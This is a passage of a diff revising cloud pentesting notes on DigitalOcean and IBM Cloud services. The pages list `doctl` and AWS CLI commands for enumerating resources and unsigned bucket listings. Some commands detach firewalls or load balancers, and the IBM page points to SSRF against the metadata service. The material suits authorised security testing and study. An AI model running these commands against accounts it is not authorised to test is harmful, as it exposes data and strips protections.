+1. **Ease of Management**: DigitalOcean manages the control plane and selected cluster components, while users retain administrator access through the Kubernetes API.<sup>[[2]](#references)</sup>
+2. **Management Interfaces**: Clusters can be administered through the DigitalOcean Control Panel, API, `doctl`, and standard tools such as `kubectl`.<sup>[[1]](#references)[[3]](#references)</sup>
+3. **Integration with DigitalOcean Services**: DOKS natively integrates with products such as DigitalOcean Load Balancers and Volumes Block Storage.<sup>[[2]](#references)</sup>
+4. **Updates and Upgrades**: Automatic patch and subsystem upgrades can be enabled for a cluster, while upgrades to unsupported Kubernetes versions can be required even when automatic upgrades are disabled.<sup>[[4]](#references)</sup>
 
 ### Connection
+
+`doctl kubernetes cluster kubeconfig save` downloads a cluster's credentials and merges them into the local kubeconfig. A kubeconfig can also be downloaded from the Control Panel and passed explicitly to `kubectl`.<sup>[[3]](#references)</sup>
 
 ```bash
 # Generate kubeconfig from doctl
@@ -24,6 +24,8 @@ kubectl --kubeconfig=/<pathtodirectory>/k8s-1-25-4-do-0-ams3-1670939911166-kubec
 ```
 
 ### Enumeration
+
+The following commands enumerate clusters in the current DigitalOcean account, the node pools and node counts in a selected cluster, and the volumes, volume snapshots, and load balancers associated with that cluster.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 # Get clusters
@@ -36,7 +38,14 @@ doctl kubernetes cluster node-pool list <cluster-id>
 doctl kubernetes cluster list-associated-resources <cluster-id>
 ```
 
+## References
+
+- [1] [DigitalOcean Kubernetes](https://docs.digitalocean.com/products/kubernetes/)
+- [2] [The Managed Elements of DigitalOcean Kubernetes](https://docs.digitalocean.com/products/kubernetes/details/managed/)
+- [3] [How to Connect to a DigitalOcean Kubernetes Cluster](https://docs.digitalocean.com/products/kubernetes/how-to/connect-to-cluster/)
+- [4] [How to Upgrade DOKS Clusters to Newer Versions](https://docs.digitalocean.com/products/kubernetes/how-to/upgrade-cluster/)
+- [5] [doctl kubernetes cluster list](https://docs.digitalocean.com/reference/doctl/reference/kubernetes/cluster/list/)
+- [6] [doctl kubernetes cluster node-pool list](https://docs.digitalocean.com/reference/doctl/reference/kubernetes/cluster/node-pool/list/)
+- [7] [doctl kubernetes cluster list-associated-resources](https://docs.digitalocean.com/reference/doctl/reference/kubernetes/cluster/list-associated-resources/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
@@ -1,8 +1,8 @@
 # DO - Networking
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ### Domains
+
+List the domains in the account and the DNS records for a specific domain. The domain-record commands also support creating records.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 doctl compute domain list
@@ -10,7 +10,9 @@ doctl compute domain records list <domain>
 # You can also create records
 ```
 
-### Reserverd IPs
+### Reserved IPs
+
+List reserved IP addresses or unassign one from its Droplet.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 doctl compute reserved-ip list
@@ -19,22 +21,28 @@ doctl compute reserved-ip-action unassign <ip>
 
 ### Load Balancers
 
+List load balancers, detach backend Droplets, or add a forwarding rule.<sup>[[5]](#references)[[6]](#references)</sup>
+
 ```bash
 doctl compute load-balancer list
 doctl compute load-balancer remove-droplets <id> --droplet-ids 12,33
-doctl compute load-balancer add-forwarding-rules <id> --forwarding-rules entry_protocol:tcp,entry_port:3306,...
+doctl compute load-balancer add-forwarding-rules <id> --forwarding-rules entry_protocol:tcp,entry_port:3306,target_protocol:tcp,target_port:3306
 ```
 
 ### VPC
 
-```
+List the VPC networks in the account.<sup>[[7]](#references)</sup>
+
+```bash
 doctl vpcs list
 ```
 
 ### Firewall
 
 > [!CAUTION]
-> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
+> DigitalOcean Cloud Firewalls are separate from host firewalls and enforce rules only for the Droplets or tags to which they are applied. Confirm that each intended Droplet is attached to a Cloud Firewall; the firewall creation form can be submitted without assigning any Droplets.<sup>[[8]](#references)[[9]](#references)</sup>
+
+List Cloud Firewalls, identify those attached to a Droplet, or detach a Droplet from a firewall.<sup>[[8]](#references)</sup>
 
 ```bash
 doctl compute firewall list
@@ -42,7 +50,16 @@ doctl compute firewall list-by-droplet <droplet-id>
 doctl compute firewall remove-droplets <fw-id> --droplet-ids <droplet-id>
 ```
 
+## References
+
+- [1] [doctl compute domain](https://docs.digitalocean.com/reference/doctl/reference/compute/domain/)
+- [2] [doctl compute domain records list](https://docs.digitalocean.com/reference/doctl/reference/compute/domain/records/list/)
+- [3] [doctl compute reserved-ip](https://docs.digitalocean.com/reference/doctl/reference/compute/reserved-ip/)
+- [4] [doctl compute reserved-ip-action unassign](https://docs.digitalocean.com/reference/doctl/reference/compute/reserved-ip-action/unassign/)
+- [5] [doctl compute load-balancer list](https://docs.digitalocean.com/reference/doctl/reference/compute/load-balancer/list/)
+- [6] [How to Manage Regional Load Balancers](https://docs.digitalocean.com/products/networking/load-balancers/how-to/manage/)
+- [7] [doctl vpcs list](https://docs.digitalocean.com/reference/doctl/reference/vpcs/list/)
+- [8] [doctl compute firewall](https://docs.digitalocean.com/reference/doctl/reference/compute/firewall/)
+- [9] [How to Create Firewalls](https://docs.digitalocean.com/products/networking/firewalls/how-to/create/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
@@ -1,11 +1,10 @@
 # DO - Projects
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
-> For more info check:
+A DigitalOcean Project is a high-level organizational container for related resources, including Droplets, Spaces buckets, database clusters, Kubernetes clusters, load balancers, domains, and App Platform apps.<sup>[[1]](#references)</sup>
+
+For more information, see:
 
 {{#ref}}
 ../do-basic-information.md
@@ -13,14 +12,17 @@
 
 ### Enumeration
 
-It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily:
+Use `doctl` to **enumerate the projects available to the authenticated account** and then list the resources assigned to a specific project. The resource listing includes each resource's uniform resource name (URN).<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 doctl projects list # Get projects
 doctl projects resources list <proj-id> # Get all the resources of a project
 ```
 
+## References
+
+- [1] [digitalocean_project](https://docs.digitalocean.com/reference/terraform/reference/resources/project/)
+- [2] [doctl projects list](https://docs.digitalocean.com/reference/doctl/reference/projects/list/)
+- [3] [doctl projects resources list](https://docs.digitalocean.com/reference/doctl/reference/projects/resources/list/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
@@ -1,30 +1,30 @@
 # DO - Spaces
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers.
+DigitalOcean Spaces is an **S3-compatible object storage** service for data such as media files and backups. A bucket gets its own URL, whose hostname incorporates the selected datacenter region. Operators can manage Spaces in the DigitalOcean control panel or through compatible APIs and clients, including from Droplets.<sup>[[1]](#references)</sup>
 
 ### Access
 
-Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space.
+Visibility operates at two layers rather than through one public/private switch. Bucket listing permissions determine who can enumerate object names and metadata, while object permissions determine who can read each object. Consequently, an open listing may reveal the names of private objects; a restricted listing requires valid access keys. An object itself may be made public or left accessible only to authorized users.<sup>[[2]](#references)[[3]](#references)</sup>
+
+Applications and S3-compatible clients authenticate with a Spaces **access key** and **secret key**. Keys can have full access or permissions limited to particular buckets; they are created in the control panel, and the secret is displayed only once.<sup>[[4]](#references)</sup>
 
 A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\
-Note the **region** as **subdomain**.
+Here, `fra1` identifies the **region**.<sup>[[1]](#references)</sup>
 
-Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials).
-
-However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time:
+A private object can still be shared temporarily through a presigned URL created in the control panel or with an S3-compatible client. Such a URL contains `X-Amz-` parameters describing the signature and expiration, for example `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=<access-key-and-scope>&X-Amz-Date=<timestamp>&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=<signature>`.<sup>[[3]](#references)</sup>
 
 <figure><img src="../../../images/image (277).png" alt=""><figcaption></figcaption></figure>
 
 ### Enumeration
 
+The AWS CLI `s3 ls` command lists buckets or objects. Use `--endpoint-url` to select the Spaces regional endpoint and `--no-sign-request` for an unsigned request; unsigned enumeration succeeds only when the bucket's listing permissions allow it.<sup>[[2]](#references)[[5]](#references)</sup> The CLI can also create a time-limited presigned URL for a private object.<sup>[[3]](#references)</sup>
+
 ```bash
 # Unauthenticated
 ## Note how the region is specified in the endpoint
-aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname
+aws s3 ls --endpoint-url=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname
 
 # Authenticated
 ## Configure spaces keys as AWS credentials
@@ -34,16 +34,22 @@ AWS Secret Access Key [None]: <Secret>
 Default region name [None]:
 Default output format [None]:
 
-## List all buckets in a region
-aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com
+## List buckets accessible to the key through this regional endpoint
+aws s3 ls --endpoint-url=https://fra1.digitaloceanspaces.com
 
 ## List files inside a bucket
-aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname
+aws s3 ls --endpoint-url=https://fra1.digitaloceanspaces.com s3://uniqbucketname
 
-## It's also possible to generate authorized access to buckets from the API
+## Generate a one-hour presigned URL for a private object
+aws s3 presign s3://uniqbucketname/filename --expires-in 3600 --endpoint-url=https://fra1.digitaloceanspaces.com
 ```
 
+## References
+
+- [1] [How to Create a DigitalOcean Spaces Bucket](https://docs.digitalocean.com/products/spaces/how-to/create/)
+- [2] [How to Set File Listing Permissions](https://docs.digitalocean.com/products/spaces/how-to/set-file-listing-permissions/)
+- [3] [How to Share Links to Files](https://docs.digitalocean.com/products/spaces/how-to/set-file-permissions/)
+- [4] [How to Manage Access to DigitalOcean Spaces](https://docs.digitalocean.com/products/spaces/how-to/manage-access/)
+- [5] [ls — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3/ls.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
@@ -1,18 +1,24 @@
 # DO - Volumes
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups.
+DigitalOcean Volumes are **network-attached block storage** devices that can be attached to and detached from Droplets. They are independent resources intended for persistent workloads such as databases and file storage, and they can be moved, enlarged, or captured in snapshots.<sup>[[1]](#references)</sup>
+
+A volume can be attached to only **one Droplet at a time**. Droplet backups do not include attached volumes, so protect their data with separate volume snapshots.<sup>[[2]](#references)</sup>
 
 ### Enumeration
 
+```bash
+doctl compute volume list
 ```
-compute volume list
-```
+
+The command lists the block storage volumes available to the authenticated account; `--region` can limit the results to one region, and `--output json` produces machine-readable output.<sup>[[3]](#references)</sup>
+
+## References
+
+- [1] [Volume Features](https://docs.digitalocean.com/products/volumes/details/features/)
+- [2] [Volume Limits](https://docs.digitalocean.com/products/volumes/details/limits/)
+- [3] [doctl compute volume list](https://docs.digitalocean.com/reference/doctl/reference/compute/volume/list/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/ibm-cloud-pentesting/README.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/README.md
@@ -1,21 +1,16 @@
 # IBM Cloud Pentesting
 
-{{#include ../../banners/hacktricks-training.md}}
+## What is IBM Cloud?
 
-## What is IBM cloud? (By chatGPT)
+IBM Cloud combines platform as a service (PaaS) and infrastructure as a service (IaaS) and supports public, hybrid, multicloud, and Virtual Private Cloud (VPC) deployments. Its catalog includes compute, storage, networking, containers, application-development, security, database, data, and AI services.<sup>[[1]](#references)</sup>
 
-IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud.
+IBM documents support for users ranging from small development teams to large enterprises, along with compliance-oriented catalog filters and deployable architectures for regulated workloads.<sup>[[1]](#references)</sup>
 
-When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches:
-
-1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele.
-2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ.
-3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform.
-4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud.
+For an assessment, begin by identifying the account and resource hierarchy, IAM boundaries, in-scope platform and infrastructure services, and any connections to on-premises or other cloud environments.
 
 ### Basic Information
 
-For some basic information about IAM and hierarchi check:
+For an introduction to IBM Cloud IAM and resource hierarchy, see:
 
 {{#ref}}
 ibm-basic-information.md
@@ -23,16 +18,20 @@ ibm-basic-information.md
 
 ## SSRF
 
-Learn how you can access the medata endpoint of IBM in the following page:
+The IBM Cloud VPC metadata service is disabled by default and, when enabled, is available only from within the instance. It can expose instance and initialization data, network and volume attachments, public SSH keys, and placement groups. An instance identity token can also be exchanged for an IAM token whose access is governed by the trusted profiles linked to the instance.<sup>[[2]](#references)</sup>
+
+When testing an authorized target, consider whether an SSRF in a VPC workload can reach the metadata service. The following page covers cloud-metadata SSRF testing, including IBM Cloud:
 
 {{#ref}}
 https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#ibm-cloud
 {{#endref}}
 
+IBM recommends enabling HTTPS access, disabling the metadata service when it is not needed, limiting trusted profiles, and restricting local process access to the link-local metadata address.<sup>[[3]](#references)</sup>
+
 ## References
 
-- [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/)
+- [1] [IBM Cloud platform: Hybrid, multicloud, and VPC capabilities](https://cloud.ibm.com/docs/overview?topic=overview-whatis-platform)
+- [2] [About IBM Cloud Virtual Private Cloud (VPC) Metadata on virtual server instances](https://cloud.ibm.com/docs/vpc?topic=vpc-imd-about)
+- [3] [Security best practices for the metadata service](https://cloud.ibm.com/docs/vpc?topic=vpc-imd-security-best-practices)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md
@@ -1,14 +1,14 @@
 # IBM - Basic Information
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Hierarchy
 
-IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)):
+An IBM Cloud enterprise can contain accounts directly or organize them into nested account groups. Within an account, resource groups organize IAM-managed resources, while access groups organize identities for permission assignment.<sup>[[1]](#references)[[2]](#references)</sup>
+
+IBM Cloud resource model:
 
 <figure><img src="../../images/image (225).png" alt=""><figcaption></figcaption></figure>
 
-Recommended way to divide projects:
+One practical way to divide projects:
 
 <figure><img src="../../images/image (239).png" alt=""><figcaption></figcaption></figure>
 
@@ -18,58 +18,53 @@ Recommended way to divide projects:
 
 ### Users
 
-Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\
-**Permissions** can be granted **directly** to the user with an access policy or via an **access group**.
+Users represent people in an account. They can sign in to the **IBM Cloud console**, and user API keys can be used for API and CLI calls with the user's assigned access. Permissions can be granted **directly** through access policies or through an **access group**.<sup>[[3]](#references)</sup>
 
 ### Trusted Profiles
 
-These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\
-**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**.
+Trusted profiles are comparable to assumable roles: IAM policies grant access to the profile, and an authorized federated user, compute resource, IBM Cloud service, or service ID can apply it. Compute resources can use short-lived identity tokens instead of storing long-lived API keys. A trusted profile can also be added to an access group.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### Service IDs
 
-This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\
-**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**.
+A service ID gives an application or service its own identity for accessing IAM-enabled resources, avoiding the use of an individual user's credentials. Applications can authenticate as the service ID with an associated API key. Permissions can be granted **directly** to the service ID through access policies or through an **access group**.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### Identity Providers
 
-External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**.
+External **identity providers** can federate users into IBM Cloud. SAML attributes can determine which trusted profiles a federated identity is allowed to apply during login.<sup>[[3]](#references)</sup>
 
 ### Access Groups
 
-In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\
-**Permissions** can be granted **directly** to the trusted profile with an access policy.\
-An **access group cannot be a member** of another access group.
+An access group can contain **users, trusted profiles, and service IDs**. Policies assigned to the group apply to its members, while identities can also retain policies assigned directly to them. These three identity types are the supported access-group member types; access groups themselves cannot be nested as members.<sup>[[2]](#references)[[3]](#references)[[5]](#references)</sup>
 
 ### Roles
 
-A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\
-**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more).
+A role is a **set of permissions**. IBM Cloud distinguishes platform management roles from service access roles. The standard platform roles are **Viewer, Operator, Editor, and Administrator**; common service roles are **Reader, Writer, and Manager**, but the roles and mapped actions available for a policy depend on the selected service.<sup>[[4]](#references)</sup>
 
-Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**.
+If the predefined roles are too broad, an account owner or a user with the required Role Management access can create a **custom role** for a service by selecting only the needed actions.<sup>[[4]](#references)</sup>
 
 ### Access Policies
 
-Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\
-When creating the policy you need to choose:
+An access policy combines a **subject**, a **target**, and one or more **roles**. The subject can be a user, service ID, access group, or trusted profile; the target defines the services or resources that subject can access.<sup>[[5]](#references)</sup>
 
-- The **service** where permissions will be granted
-- **Affected resources**
-- Service & Platform **access** that will be granted
-  - These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here.
+When creating a policy, choose:
+
+- The target **service**, service group, or account-management service
+- The **affected resources**, which can range from broad account or resource-group scopes to a specific service instance or subresource
+- The platform and service **roles** that define the allowed actions, including any available **custom role**
 - **Conditions** (if any) to grant the permissions
 
 > [!NOTE]
-> To grant access to several services to a user, you can generate several access policies
+> A policy can target a group such as **All Identity and Access enabled services** or **All Account Management services**, so granting access across several services does not always require a separate policy for each one.<sup>[[5]](#references)</sup>
 
 <figure><img src="../../images/image (248).png" alt=""><figcaption></figcaption></figure>
 
 ## References
 
-- [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises)
-- [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview)
+- [1] [Organizing accounts in an enterprise](https://cloud.ibm.com/docs/enterprise-management?topic=enterprise-management-enterprise-organize)
+- [2] [What's in an account?](https://cloud.ibm.com/docs/account?topic=account-overview)
+- [3] [Identity types for users, services, and workloads](https://cloud.ibm.com/docs/iam?topic=iam-identity-overview)
+- [4] [Platform and service access roles for permissions](https://cloud.ibm.com/docs/iam?topic=iam-userroles)
+- [5] [IAM access policies for resource-level permissions](https://cloud.ibm.com/docs/iam?topic=iam-iamusermanpol)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md
@@ -1,32 +1,34 @@
 # IBM - Hyper Protect Crypto Services
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-IBM Hyper Protect Crypto Services is a cloud service that provides **highly secure and tamper-resistant cryptographic key management and encryption capabilities**. It is designed to help organizations protect their sensitive data and comply with security and privacy regulations such as GDPR, HIPAA, and PCI DSS.
+IBM Cloud Hyper Protect Crypto Services is a dedicated, single-tenant key management and cloud hardware security module (HSM) service. Its Keep Your Own Key (KYOK) model lets customers load the HSM master key and control the resulting key hierarchy; IBM Cloud administrators do not have access to those keys. IBM has deprecated the service: new instances cannot be created after March 28, 2026, and existing premium instances are supported until March 28, 2027.<sup>[[1]](#references)</sup>
 
-Hyper Protect Crypto Services uses **FIPS 140-2 Level 4 certified hardware security modules** (HSMs) to store and protect cryptographic keys. These HSMs are designed to r**esist physical tampering** and provide high levels of **security against cyber attacks**.
+The service is built on IBM 4768 or 4769 cryptographic coprocessors certified at FIPS 140-2 Level 4. IBM states that key material remains inside the cryptographic boundary. At Level 4, FIPS 140-2 requires a tamper-detection envelope, immediate zeroization of plaintext secret and private keys when tampering is detected, and protection or testing against abnormal temperature and voltage conditions.<sup>[[2]](#references)[[3]](#references)</sup>
 
-The service provides a range of cryptographic services, including key generation, key management, digital signature, encryption, and decryption. It supports industry-standard cryptographic algorithms such as AES, RSA, and ECC, and can be integrated with a variety of applications and services.
+Hyper Protect Crypto Services provides key creation, import, rotation, storage, and management as well as hardware-backed key generation, encryption, decryption, signing, and signature verification. Applications can use PKCS #11 or Enterprise PKCS #11 over gRPC (GREP11); supported mechanisms include AES, RSA, and elliptic-curve operations, although the precise mechanism set depends on the crypto-card firmware.<sup>[[1]](#references)[[4]](#references)</sup>
+
+The service can integrate with IBM Cloud data and storage services and VMware environments for data-at-rest encryption. It also integrates with IBM Cloud IAM for access control and Activity Tracker for monitoring and auditing. IBM documents compliance support for GDPR, HIPAA, and ISO controls, but using the service does not by itself make an application or organization compliant.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ### What is a Hardware Security Module
 
-A hardware security module (HSM) is a dedicated cryptographic device that is used to generate, store, and manage cryptographic keys and protect sensitive data. It is designed to provide a high level of security by physically and electronically isolating the cryptographic functions from the rest of the system.
+A hardware security module is a dedicated cryptographic device that safeguards and manages cryptographic keys and performs cryptographic operations. Hyper Protect Crypto Services keeps its key material inside the HSM's cryptographic boundary.<sup>[[2]](#references)</sup>
 
-The way an HSM works can vary depending on the specific model and manufacturer, but generally, the following steps occur:
+For Hyper Protect Crypto Services, the documented key lifecycle and cryptographic interfaces support the following workflow:<sup>[[1]](#references)[[4]](#references)</sup>
 
-1. **Key generation**: The HSM generates a random cryptographic key using a secure random number generator.
-2. **Key storage**: The key is **stored securely within the HSM, where it can only be accessed by authorized users or processes**.
-3. **Key management**: The HSM provides a range of key management functions, including key rotation, backup, and revocation.
-4. **Cryptographic operations**: The HSM performs a range of cryptographic operations, including encryption, decryption, digital signature, and key exchange. These operations are **performed within the secure environment of the HSM**, which protects against unauthorized access and tampering.
-5. **Audit logging**: The HSM logs all cryptographic operations and access attempts, which can be used for compliance and security auditing purposes.
+1. **Key generation**: Generate a cryptographic key inside the HSM.
+2. **Key storage**: Protect the key within the HSM and permit its use only through authenticated and authorized interfaces.
+3. **Key management**: Apply lifecycle operations such as import, rotation, wrapping, and deletion.
+4. **Cryptographic operations**: Perform encryption, decryption, signing, verification, or key derivation inside the cryptographic boundary rather than exposing plaintext key material to the calling application.
+5. **Audit logging**: Send supported service events and activities to IBM Cloud Activity Tracker for monitoring and audit.<sup>[[1]](#references)</sup>
 
-HSMs can be used for a wide range of applications, including secure online transactions, digital certificates, secure communications, and data encryption. They are often used in industries that require a high level of security, such as finance, healthcare, and government.
+For this service, IBM documents that cryptographic key material is not exposed outside the cryptographic boundary.<sup>[[2]](#references)</sup> Use only its documented key-management interfaces and procedures rather than assuming that a plaintext raw key can be extracted.
 
-Overall, the high level of security provided by HSMs makes it **very difficult to extract raw keys from them, and attempting to do so is often considered a breach of security**. However, there may be **certain scenarios** where a **raw key could be extracted** by authorized personnel for specific purposes, such as in the case of a key recovery procedure.
+## References
+
+- [1] [Overview - Standard Plan | IBM Cloud Docs](https://cloud.ibm.com/docs/hs-crypto?topic=hs-crypto-overview)
+- [2] [Security and compliance | IBM Cloud Docs](https://cloud.ibm.com/docs/hs-crypto?topic=hs-crypto-security-and-compliance)
+- [3] [FIPS 140-2: Security Requirements for Cryptographic Modules](https://csrc.nist.gov/files/pubs/fips/140-2/upd2/final/docs/fips1402.pdf)
+- [4] [Cryptographic operations: GREP11 API | IBM Cloud Docs](https://cloud.ibm.com/docs/hs-crypto?topic=hs-crypto-grep11-api-ref)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
+++ b/src/pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md
@@ -1,45 +1,47 @@
 # IBM - Hyper Protect Virtual Server
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Basic Information
 
-Hyper Protect Virtual Server is a **virtual server** offering from IBM that is designed to provide a **high level of security and compliance** for sensitive workloads. It runs on **IBM Z and LinuxONE hardware**, which are designed for high levels of security and scalability.
+IBM Hyper Protect Virtual Servers (HPVS) use **IBM Secure Execution for Linux** to place each workload in an instance-level secure enclave. IBM documents public-cloud and on-premises distributions; the latter runs on KVM-enabled Linux logical partitions on IBM Z or LinuxONE, while the IBM Cloud distribution runs as a VPC virtual server instance on secure-execution-enabled `s390x` profiles.<sup>[[1]](#references)[[2]](#references)</sup>
 
-Hyper Protect Virtual Server uses **advanced security features** such as secure boot, encrypted memory, and tamper-proof virtualization to protect sensitive data and applications. It also provides a **secure execution environment that isolates each workload from other workloads** running on the same system.
+Secure Execution protects data in a KVM guest from inspection or modification by the hosting environment, including privileged hardware and KVM administrators. On IBM z16 and LinuxONE 4 or later, system memory is also transparently encrypted against physical attacks, independently of Secure Execution's guest protection.<sup>[[3]](#references)</sup>
 
-This virtual server offering is designed for workloads that require the highest levels of security and compliance, such as financial services, healthcare, and government. It allows organizations to run their sensitive workloads in a virtual environment while still meeting strict security and compliance requirements.
+Data volumes attached to HPVS for VPC are LUKS-encrypted using seeds supplied in the deployment contract and can optionally incorporate a seed protected by IBM Hyper Protect Crypto Services.<sup>[[4]](#references)</sup>
+
+{% hint style="warning" %}
+IBM Cloud Hyper Protect Virtual Servers for VPC is deprecated. New instances cannot be created after 28 February 2026; existing instances are supported until 20 February 2027 and are scheduled for deletion on that date. IBM directs users to its Confidential Computing Container Runtime offerings for migration.<sup>[[4]](#references)</sup>
+{% endhint %}
 
 ### Metadata & VPC
 
-When you run a server like this one from the IBM service called "Hyper Protect Virtual Server" it **won't** allow you to configure **access to metadata,** link any **trusted profile**, use **user data**, or even a **VPC** to place the server in.
+Despite its name, HPVS for VPC is deployed **inside an IBM Cloud VPC**, whose network and security-group controls remain available. The unsupported feature is the **VPC metadata service** for Hyper Protect instances.<sup>[[1]](#references)[[2]](#references)</sup>
 
-However, it's possible to **run a VM in a IBM Z linuxONE hardware** from the service "**Virtual server for VPC**" which will allow you to **set those configs** (metadata, trusted profiles, VPC...).
